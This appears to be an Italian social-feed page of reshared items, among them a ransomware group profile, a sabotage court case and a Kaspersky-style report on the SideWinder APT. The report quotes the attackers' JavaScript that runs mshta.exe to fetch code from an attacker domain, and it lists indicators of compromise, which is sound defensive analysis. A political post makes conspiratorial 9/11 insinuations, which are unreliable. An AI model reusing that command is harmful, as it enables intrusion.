La legge italiana sulla space economy: resilienza e sicurezza come obblighi
@Informatica (Italy e non Italy 😁)
Procede l’iter della prima legge quadro italiana sullo Spazio che tiene conto di sicurezza e resilienza come prerequisiti per operare. Passa l’approvazione alla Camera e procede all’esame del Senato. Attività spaziali sicure e resilienti o niente
L'articolo
Informatica (Italy e non Italy 😁) reshared this.
The censorship battle goes global
Unsubstantiated claims that online safety rules restrict people's free speech have spread worldwide. Regulators are not prepared to respond.
Crazyhunter: il nuovo ransomware con il “Sistema di Annientamento Dati Tridimensionale”
Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: Crazyhunter.
Con un’identità distinta e un manifesto che lo pone in contrasto con altri attori della scena cybercriminale, Crazyhunter si presenta come un’operazione sofisticata che punta sulla velocità di attacco, la distruzione dei dati e un sistema di branding criminale altamente strutturato.
Dalle informazioni raccolte sul loro Data Leak Site (DLS), disponibile nella rete Tor, il gruppo sembra adottare un approccio metodico e aggressivo, mirato a compromettere la sicurezza aziendale nel minor tempo possibile.
Con un sistema di negoziazione e gestione del riscatto che include strumenti di “dimostrazione” delle loro capacità distruttive, Crazyhunter si distingue per un modello di business che enfatizza la crittografia avanzata e persino l’uso della blockchain per registrare le loro “promesse” di decrittazione.
Struttura del DLS di Crazyhunter
Il portale Tor di Crazyhunter si articola in più sezioni, con un design minimale ma funzionale.
L’homepage Presenta il nome del gruppo e il motto: “There is no absolute safety”. Un’affermazione che riflette la loro filosofia, secondo cui nessun sistema è immune a un attacco ben strutturato.
Victim List
L’elenco delle vittime pubblicate mostra aziende ed enti, prevalentemente in Taiwan, tra cui ospedali e università. Ogni scheda riporta:
- Importo del riscatto richiesto (fino a $1.500.000).
- Stato della trattativa, con alcune voci contrassegnate come Expired (probabilmente significa che i dati verranno rilasciati) e altre con la dicitura Successful cooperation (indicando un pagamento effettuato).
- Timer per la scadenza dell’accordo, suggerendo un meccanismo di pressione psicologica sulle vittime.
About Us Qui il gruppo descrive il proprio modus operandi e i punti di forza del ransomware.
Contact Us Pagina con un form di contatto, utilizzata per le negoziazioni o possibili collaborazioni.
Tecniche e Tattiche di Attacco
Dalle informazioni fornite nel manifesto strategico, Crazyhunter si propone come un’operazione altamente tecnica, con una serie di caratteristiche distintive che lo rendono particolarmente pericoloso:
Approccio ultra-rapido: il “72-hour Vulnerability Response Vacuum”
Crazyhunter sostiene di bucare la sicurezza delle vittime in meno di 72 ore, grazie a:
- Exploit esclusivi, con un tempo di rilevamento superiore del 300% rispetto alle medie stimate dal MITRE.
- Bypass avanzato dei più noti sistemi di protezione degli endpoint, tra cui CrowdStrike, SentinelOne, Microsoft Defender XDR, Symantec EDR, Trend Micro XDR.
Questo indica che il gruppo sfrutta vulnerabilità zero-day o N-day ben mirate, oltre a tattiche di evasion avanzate, che potrebbero includere l’uso di malware polimorfico e tecniche di attacco senza file (fileless attacks).
Il “Three-dimensional Data Annihilation System”
Crazyhunter non si limita a cifrare i dati, ma introduce un concetto di “annientamento” su tre livelli:
- Encryption Layer → Utilizza l’algoritmo XChaCha20-Poly1305, noto per la sua sicurezza e velocità, rendendo impossibile il recupero dei dati senza la chiave corretta.
- Destruction Layer → Impiega una tecnologia di cancellazione approvata dalla CIA, probabilmente riferendosi a standard come DoD 5220.22-M o metodi di sovrascrittura multipla per rendere i dati irrecuperabili.
- Deterrence Layer → Qui emerge un aspetto nuovo nel panorama ransomware: il gruppo afferma di generare prove compromettenti altamente realistiche contro i dirigenti delle aziende attaccate, mediante AI e deepfake, per esercitare una pressione aggiuntiva nelle negoziazioni.
Questo mix di crittografia avanzata, distruzione totale dei dati e minacce reputazionali rende Crazyhunter un attore unico nel suo genere, combinando ransomware tradizionale con metodi di coercizione psicologica.
Criminal Branding e Blockchain
Crazyhunter si distingue anche per un concetto inedito nel mondo del ransomware: il branding criminale. Tra i servizi offerti ci sono:
- Possibilità di ritardare la pubblicazione dei dati pagando il 50% del riscatto in anticipo.
- Una guida alla remediation delle vulnerabilità utilizzate per l’attacco, apparentemente come incentivo al pagamento.
- Un video di prova della cancellazione dei dati una volta pagato il riscatto.
Infine, il manifesto strategico sottolinea che il gruppo non si considera “avido” come REvil o “troppo rumoroso” come LockBit, e dichiara di fare solo tre cose:
- Dimostrare l’inevitabilità dell’attacco attraverso la matematica.
- Assicurare l’irreversibilità della minaccia tramite il codice.
- Registrare ogni promessa mantenuta sulla blockchain.
L’ultimo punto suggerisce che Crazyhunter potrebbe utilizzare una blockchain pubblica o privata per tenere traccia delle operazioni completate, forse per dimostrare alle future vittime che mantengono la parola quando si tratta di fornire i decryptor dopo il pagamento.
Obiettivi e Vittime
L’analisi della victim list sul DLS di Crazyhunter mostra che il gruppo si è concentrato prevalentemente su organizzazioni taiwanesi, con un focus su:
- Università e istituti di ricerca (Asia University, Asia University Hospital).
- Strutture sanitarie (Mackay Hospital, Changhua Christian Medical Foundation).
- Aziende del settore energetico (Huacheng Electric).
L’inclusione di ospedali e istituzioni accademiche suggerisce un target opportunistico, dove la probabilità di pagamento è elevata a causa della sensibilità dei dati coinvolti. Tuttavia, è possibile che il gruppo espanda il proprio raggio d’azione verso aziende di altri settori nei prossimi mesi.
Conclusioni
Crazyhunter non è il solito gruppo ransomware. A differenza di altre operazioni che si concentrano solo sulla cifratura dei file, questo gruppo introduce tattiche di pressione aggiuntive, tra cui:
- Distruzione irreversibile dei dati, oltre alla cifratura.
- Uso di AI per creare prove compromettenti contro i dirigenti.
- Registrazione delle operazioni sulla blockchain per costruire “fiducia” nel mercato criminale.
Sebbene sia ancora presto per valutarne l’impatto complessivo, Crazyhunter ha già dimostrato di poter colpire organizzazioni di alto profilo e di avere un modello operativo altamente strategico. La combinazione di exploit avanzati, crittografia sofisticata e tattiche di coercizione lo rende una minaccia emergente da non sottovalutare.
Per le aziende, la lezione è chiara: non basta proteggersi dal ransomware tradizionale. Le nuove generazioni di cybercriminali stanno affinando strategie sempre più distruttive e difficili da contrastare.
L'articolo Crazyhunter: il nuovo ransomware con il “Sistema di Annientamento Dati Tridimensionale” proviene da il blog della sicurezza informatica.
Mi sono chiesto a lungo perché non mi piacesse il lavoro di Crozza, almeno quello degli ultimi anni, poi alla fine ho capito.
Immagino che questo sia il suo modo di lavorare, perciò lo considero responsabile fino a un certo punto, ma mi chiedo quanto ci faccia bene, in questo momento storico, vedere imitazioni e caricature di OGNI SACROSANTO PERSONAGGIO PUBBLICO che l'Universo sia stato in grado di creare.
In particolare, i personaggi su cui lo vedo più critico sono quelli di sinistra e/o quelli in carica in questo momento.
Ma sì, bella idea! Distruggiamo la credibilità di tutti, indiscriminatamente, che siano cariche o istituzioni, anche Europee.
Coem si chiamava quell'altro più a est che ha lo stesso obiettivo? Ah, sì, un certo Vladimir, è non parlo di Luxuria.
Non dico che ci sia necessariamente un nesso, magari è una cosa inconscia, ma di fatto è quello che avviene, secondo me.
Sono il solo a percepire queste cose, me le sto immaginando? Possibilissimo.
Ben(e)detto dell’8 marzo 2025
@Politica interna, europea e internazionale
L'articolo Ben(e)detto dell’8 marzo 2025 proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
Non scriviamo più a mano, addio corsivo? “Pc e tablet non possono sostituire carta e penna, ne va della nostra capacità mentale”
@Politica interna, europea e internazionale
L’imperante uso dei device induce a riflettere sull’uso sempre meno considerato della scrittura a mano e in corsivo: ne parliamo con Andrea Cangini,
Politica interna, europea e internazionale reshared this.
Windows 11 in equilibrio fra privacy e trasparenza: per un approccio Zero trust
@Informatica (Italy e non Italy 😁)
Windows 11 introduce la disattivazione del riconoscimento vocale online, un controllo granulare sulla cronologia delle attività, la gestione dell'ID pubblicitario e delle autorizzazioni per le app. Ecco tutte le migliorie sul fronte
reshared this
You Are Already Traveling at the Speed of Light
Science fiction authors and readers dream of travelling at the speed of light, but Einstien tells us we can’t. You might think that’s an arbitrary rule, but [FloatHeadPhysics] shows a different way to think about it. Based on a book he’s been reading, “Relativity Visualized,” he provides a graphic argument for relativity that you can see in the video below.
The argument starts off by explaining how a three-dimensional object might appear in a two-dimensional world. In this world, everything is climbing in the hidden height dimension at the exact same speed.
Our 2D friends, of course, can only see the shadow of the 3D object so if it is staying in one place on the table surface, the object never seems to move. However, just as we can measure time with a clock, the flat beings could devise a way to measure height. They would see that the object was moving “through height” at the fixed speed.
Now suppose the object turns a bit and is moving at, say, a 45 degree angle relative to the table top. Now the shadow moves and the “clock speed” measuring the height starts moving more slowly. If the object moves totally parallel to the surface, the shadow moves at the fixed speed and the clock speed shadow doesn’t move at all.
This neatly explains time dilation and length contraction. It also shows that the speed of light isn’t necessarily a rule. It is simply that everything in the observable universe is moving at the speed of light and how moving through space affects it.
Doesn’t make sense? Watch the video and it will. Pretty heady stuff. We love how passionate [FloatHeadPhysics] gets about the topic. If you prefer a funnier approach, turn to the BBC. Or, if you like the hands-on approach, build a cloud chamber and measure some muons.
youtube.com/embed/TJmgKdc7H34?…
Vendetta Digitale! Un Dipendente Infedele Sabota l’azienda con un Kill Switch dopo il licenziamento
Negli Stati Uniti, la corte ha condannato uno sviluppatore di software Davis Lu, 55 anni, il quale è stato dichiarato colpevole di aver deliberatamente sabotato i sistemi informatici della sua ex azienda dopo essere stato declassato. L’incidente è avvenuto presso Eaton, una grande azienda impegnata nella gestione dell’energia e nella fornitura di soluzioni nei campi dell’ingegneria elettrica, idraulica e meccanica.
Lou lavorava nell’azienda dal 2007, ma le sue responsabilità e il suo stipendio sono stati notevolmente ridotti in seguito a una riorganizzazione aziendale nel 2018. In risposta, ha sviluppato un malware e ha installato un “kill switch” sui sistemi aziendali, che ha poi causato un grave guasto. Il codice dannoso includeva loop infiniti che sovraccaricavano le risorse del server di produzione, causando arresti anomali e impedendo agli utenti di effettuare l’accesso.
Inoltre, Lou ha eliminato i profili dei suoi colleghi e ha implementato un meccanismo di blocco che si attivava quando il suo account veniva disabilitato in Windows Active Directory. Questo software, chiamato tecnicamente “kill switch” è stato crittografato con il nome “IsDLEnabledinAD“, che sta per “Is Davis Lou Active in Active Directory“.
Al momento del suo licenziamento, il 9 settembre 2019, il codice ha automaticamente bloccato l’accesso ai sistemi per migliaia di dipendenti.
Il giorno in cui gli fu ordinato di restituire il portatile aziendale, Lou cancellò i dati crittografati. Secondo il Dipartimento di Giustizia degli Stati Uniti, le ricerche di Lu su Internet indicavano tentativi di trovare modi per aumentare i privilegi, nascondere processi ed eliminare rapidamente file.
Le azioni di Lou costarono all’azienda centinaia di migliaia di dollari di danni. Il tribunale lo ha ritenuto colpevole di aver intenzionalmente danneggiato computer protetti, reato che prevede una pena massima di 10 anni di carcere. Non è ancora stata fissata la data della sentenza.
L'articolo Vendetta Digitale! Un Dipendente Infedele Sabota l’azienda con un Kill Switch dopo il licenziamento proviene da il blog della sicurezza informatica.
freezonemagazine.com/news/dani…
Il miglior libro che Pennac non ha mai scritto! Ci sono tanti adulti e tanti bambini al 93 di avenue Meissonnier a Villemomble. Una casa grande quanto un armadio a muro dove però non manca mai la gioia di vivere. Con tenerezza, nostalgia e complicità, Daniel Picouly racconta la giornata di un bambino di dieci […]
L'articolo Daniel Picouly – Il Campo di Nessuno proviene da FREE ZONE
Quale ReArm Europe? Limiti e opportunità del piano von der Leyen secondo Braghini
@Notizie dall'Italia e dal mondo
È un percorso accidentato quello con cui si cimenterà la Commissione europea con il lancio da parte di Ursula von der Leyen del Rearm Europe plan (Reap), soggetto all’adozione da parte dei Paesi membri. Trattandosi di un piano, sono elencate macro-tematiche
Notizie dall'Italia e dal mondo reshared this.
La terapia della famiglia e la prospettiva della differenza di genere
Casualmente avevo programmato la ripubblicazione di questo contributo nel momento in cui l’attualità ci consegna la notizia che negli Stati Uniti vengono messe al bando delle parole, una delle quali è gender. In questa relazione, come poi nel libro che pubblicammo, è una parola che ricorre di frequente: Prima di essere spacciata come una specie di mostro, nemico delle famiglie e dei valori, gender era una parola relativamente nota per via dell’espressione gender studies, di cui per una serie di ragioni non si usava molto il corrispettivo italiano.
Ancora più volentieri, dunque, ripubblico questo contributo quasi giovanile, in un clima in cui si manomette il senso delle parole per liberarsi di decenni di elaborazione del pensiero.
massimogiuliani.it/blog/2025/0…
Per una terapia sistemica “sensibile al genere”
A proposito di una ricerca che ho condotto anni fa con Adriana Valle sulle questioni di genere in terapia della famiglia e sulla prescrittività dei ruoli maschile e femminile.Corpi che parlano, il blog
SideWinder targets the maritime and nuclear sectors with an updated toolset
Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.
We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.
In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.
Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.
Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024
It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.
Infection vectors
The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.
The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.
The documents used various themes to deceive victims into believing they are legitimate.
Some documents concerned nuclear power plants and nuclear energy agencies.
Malicious documents related to nuclear power plants and energy
Many others concerned maritime infrastructures and various port authorities.
Malicious documents relating to maritime infrastructures and different port authorities
In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.
We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.
Examples of generic malicious documents
RTF exploit
The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the
mshtml.RunHTMLApplication function.
In the new version, the embedded JavaScript runs the Windows utility
mshta.exe and obtains additional code from a remote server:javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe
dgtk.depo-govpk[.]com/19263687…);window.close();")
The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.
- It uses the GlobalMemoryStatusEx function to determine the size of RAM.
- It attempts to load the nlssorting.dll library and terminates execution if operation succeeds.
JavaScript loader
The RTF exploit led to the execution of the
mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker.mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui
The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.
The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.
The second stage is another JavaScript file. It enumerates the subfolders at Windows%\Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable
COMPLUS_Version.
Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.
Downloader Module
This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.
In our latest investigation, we discovered a new version of the
app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions.
In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”.
Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.
The WMI query is executed only when no Kaspersky processes are running on the system.
Backdoor Loader
The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.
In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:
propsys.dll
vsstrace.dll
During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:
JetCfg.dll
policymanager.dll
winmm.dll
xmllite.dll
dcntel.dll
UxTheme.dll
The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection.
During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:
C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]
It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.
Victims
SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.
Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.
Countries and territories targeted by SideWinder in 2024
Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.
In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.
Conclusion
SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.
Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.
To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.
We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.
***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.
Indicators of compromise
Microsoft Office Documents
e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c
Backdoor Loader
0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe
Domains and IPs
pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info
directt88[.]com
file-dwnld[.]org
defencearmy[.]pro
document-viewer[.]info
aliyum[.]email
d0cumentview[.]info
debcon[.]live
document-viewer[.]live
documentviewer[.]info
ms-office[.]app
ms-office[.]pro
pncert[.]info
session-out[.]com
zeltech[.]live
ziptec[.]info
depo-govpk[.]com
crontec[.]site
mteron[.]info
mevron[.]tech
veorey[.]live
mod-kh[.]info
freezonemagazine.com/rubriche/…
Il cammino della speranza è uno dei capitoli principali della produzione di Pietro Germi, autore di vertice della cinematografia italiana (dal talento inverso alla popolarità ottenuta in vita), oltre ad essere senza dubbio uno dei film più importanti e significativi della storia del nostro cinema. Un film di grande spessore, non solo per le sue […]
L'articolo Il cammino della speranza proviene da
Il
ZX Spectrum, Soviet Style: A 44-IC Clone You Can Build
If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s less than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’ build log.
The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’ replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.
While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning for further improvements. Inspired to build your own? Read [Alex]’ full project log here.
“Se i massacri continueranno, non rimarrà un solo alawita in Siria”
@Notizie dall'Italia e dal mondo
Fazioni estremiste dell'esercito e miliziani armati stanno liquidando alawiti, civili, bambini, donne, giovani e anziani, con il pretesto che sono resti del precedente regime
L'articolo “Se i massacri continueranno, non rimarrà un solo alawita in Siria” proviene da Pagine
reshared this
Un'immagine che chiarisce meglio di ogni parola l'abisso di servilismo nel quale siamo precipitati: il Ministro degli esteri italiano che, come una statua di sale, stringe la mano lorda di sangue dell'ex numero due di al-Qaeda. Tutti i puntini, a partire dall'11 Settembre, sono oramai uniti. Solo chi non vuol vedere, non è in grado di riconoscere l'immagine che ne è venuta fuori.
Da Wikipedia, l'enciclopedia del Pentagono:
Al-Qāʿida è un movimento paramilitare terroristico internazionale, a ideologia islamista, ispirata a Sayyid Quṭb e ad ʿAbd Allāh al-ʿAzzām. Fu fondata l'11 agosto 1988 e guidata da Osama bin Laden fino al 2 maggio 2011. È nota per aver pianificato e messo in atto gli attentati dell'11 settembre 2001 causando la morte di circa 3000 persone tra cui soccorritori, cittadini, lavoratori e gli stessi terroristi.
Osama bin Laden spiegò l'origine del nome in una registrazione di un'intervista concessa al giornalista di Al Jazeera Taysir Aluni nell'ottobre del 2001: «Il nome di al-Qāʿida fu stabilito molto tempo fa per caso. Il defunto Abū ʿUbayda al-Banshīrī creò dei campi di addestramento per i nostri mujāhidīn contro il terrorismo russo. Usavamo chiamare i campi di addestramento "al-Qāʿida". Il nome rimase.»
Secondo l'ex-ministro degli Esteri britannico Robin Cook (laburista dimessosi per protesta contro la partecipazione britannica all'invasione in Iraq), al-Qāʿida sarebbe la traduzione in arabo di "data-base": «Per quanto ne so io, al-Qāʿida era originariamente il nome di un data-base del governo USA, con i nomi di migliaia di mujāhidīn arruolati dalla CIA per combattere contro i sovietici in Afghanistan».
Aḥmad Ḥusayn al-Sharaʿ, noto anche per il suo nome di battaglia di Abū Muḥammad al-Jawlānī o al-Jūlānī (in arabo أحمد حسين الشرع?, Aḥmad Ḥusayn al-Sharaʿ; Riyad, 5 maggio 1982), è un politico ed ex terrorista siriano, leader di Hayʼat Taḥrīr al-Shām.
Nato in una famiglia laica e borghese originaria del Golan, al-Sharaʿ si radicalizzò a partire dai primi anni 2000. Nel 2003 si unì ad al-Qāʿida in Iraq, che in seguito confluì nello Stato Islamico in Iraq. Nel 2011, su ordine del comandante dello Stato Islamico Abū Bakr al-Baghdādī, al-Sharaʿ fu inviato in Siria per creare il Fronte al-Nuṣra, con l'obiettivo di combattere il regime di Baššār al-Asad. Nel 2013 al-Sharaʿ si separò da al-Baghdādī, per associarsi ad Ayman al-Ẓawāhiri, leader di al-Qāʿida.
Giorgio Bianchi Photojournalist
filobus reshared this.
Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile!
Mancano solo due mesi alla quarta edizione della Red Hot Cyber Conference 2025, l’evento annuale gratuito organizzato dalla community di Red Hot Cyber. La conferenza si terrà a Roma, come lo scorso anno presso il Teatro Italia in Via Bari 18, nelle giornate di giovedì 8 e venerdì 9 maggio 2025.
Questo appuntamento è diventato un punto di riferimento nel panorama italiano della sicurezza informatica, dell’intelligenza artificiale e dell’innovazione tecnologica, con l’obiettivo di sensibilizzare il pubblico sui rischi del digitale e promuovere la cultura della cybersecurity, soprattutto tra i più giovani.
La community di Red Hot Cyber, fondata nel 2019 da Massimiliano Brolli, si dedica alla diffusione di informazioni, notizie e ricerche su temi legati alla sicurezza informatica, all’intelligence e all’Information Technology. Con la convinzione che la condivisione della conoscenza e la collaborazione siano fondamentali per affrontare le sfide del cyberspazio, RHC si impegna attivamente nella promozione di una cultura della sicurezza, incoraggiando il pensiero critico e stimolando l’interesse per le discipline informatiche tra i giovani.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Accoglienza alla Red Hot Cyber Conference 2024
Una Prima Giornata Dedicata Esclusivamente Ai Giovani
Come ogni anno, la prima giornata della conferenza sarà interamente dedicata ai giovani, in particolare agli studenti delle scuole medie e superiori, per avvicinarli al mondo dell’information technology e della sicurezza informatica. A differenza degli scorsi anni, i Workshop saranno accessibili solo alla giornata di Giovedì 8 maggio.
I workshop hands-on – anche questo anno organizzati con il supporto di Accenture – saranno il cuore pulsante della giornata: prima spiegheremo ai ragazzi come si fa qualcosa, poi gli daremo la possibilità di rifarlo direttamente loro stessi sui loro laptop. Questo approccio pratico e interattivo è pensato per stimolare l’interesse verso il mondo della tecnologia e della cybersecurity e fornire un’opportunità unica di toccare con mano la tecnologia.
Il Cane SPOT della Boston Dynamics all’interno dei Workshop “hands-on” della Red Hot Cyber Conference 2024
Invitiamo i ragazzi delle scuole medie, superiori ed Università a registrarsi alla conferenza, affinché possano vivere un’esperienza formativa concreta e immersiva.
Ma la prima giornata non sarà solo formazione: anche quest’anno si terrà la Capture The Flag (CTF), una competizione per hacker etici provenienti da tutta Italia. I partecipanti si sfideranno in una serie di prove pratiche di cybersecurity, hacking etico e problem-solving, accumulando punteggi per scalare la classifica e vincere la challenge.
Una CTF è una competizione di cybersecurity in cui i partecipanti devono risolvere sfide di sicurezza informatica per trovare e “catturare” delle flag, ovvero dei codici nascosti all’interno di vari scenari digitali. La CTF di RHC si svolgerà in un ambiente sicuro e controllato, offrendo a giovani hacker l’opportunità di mettere alla prova le proprie capacità, imparare nuove tecniche e confrontarsi con altri appassionati del settore.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Capture The Flag (CTF) della Red Hot Cyber Conference 2024
Una Seconda Giornata All’Insegna Della Conferenza
Se la prima giornata sarà focalizzata sui giovani e sulla formazione pratica, la seconda giornata della Red Hot Cyber Conference 2025 sarà dedicata esclusivamente alla conferenza, con una serie di speech di alto livello interamente in lingua italiana.
Esperti di sicurezza informatica, information technology e innovazione digitale si alterneranno sul palco con interventi di eccezione, affrontando temi come l’hacking, l’intelligenza artificiale applicata alla cybersecurity, la sicurezza del cloud e delle infrastrutture critiche, le guerre informatiche, la geopolitica e le strategie di difesa digitale, oltre all’evoluzione del crimine informatico.
Panel alla Red Hot Cyber Conference 2024. Da Sinistra a destr: Dott. Mario Nobile Direttore Generale di AGID, l’agenzia per l’Italia digitale, Dott. Umberto Rosini, Direttore Sistemi Informativi alla Presidenza del Consiglio dei Ministri – Dipartimento della Protezione Civile, Dott. Paolo Galdieri: Avvocato penalista, Cassazionista, è Docente universitario di Diritto penale dell’informatica, Ing. David Cenciotti: Giornalista aerospaziale, ex ufficiale dell’AM, ingegnere informatico ed esperto di cybersecurity
La giornata si aprirà con un panel istituzionale di alto livello, in cui esperti giuridici, rappresentanti delle istituzioni e professionisti del settore discuteranno di strategie e normative per la protezione digitale del Paese. Il tema del panel sarà “IL FUTURO DELLA CYBERSICUREZZA IN ITALIA – STRATEGIE PER LA PROSSIMA ERA DIGITALE”, un dibattito cruciale su come l’Italia si sta preparando ad affrontare le nuove minacce cyber, con un focus su regolamentazione, prevenzione e strategie nazionali per rafforzare la sicurezza digitale.
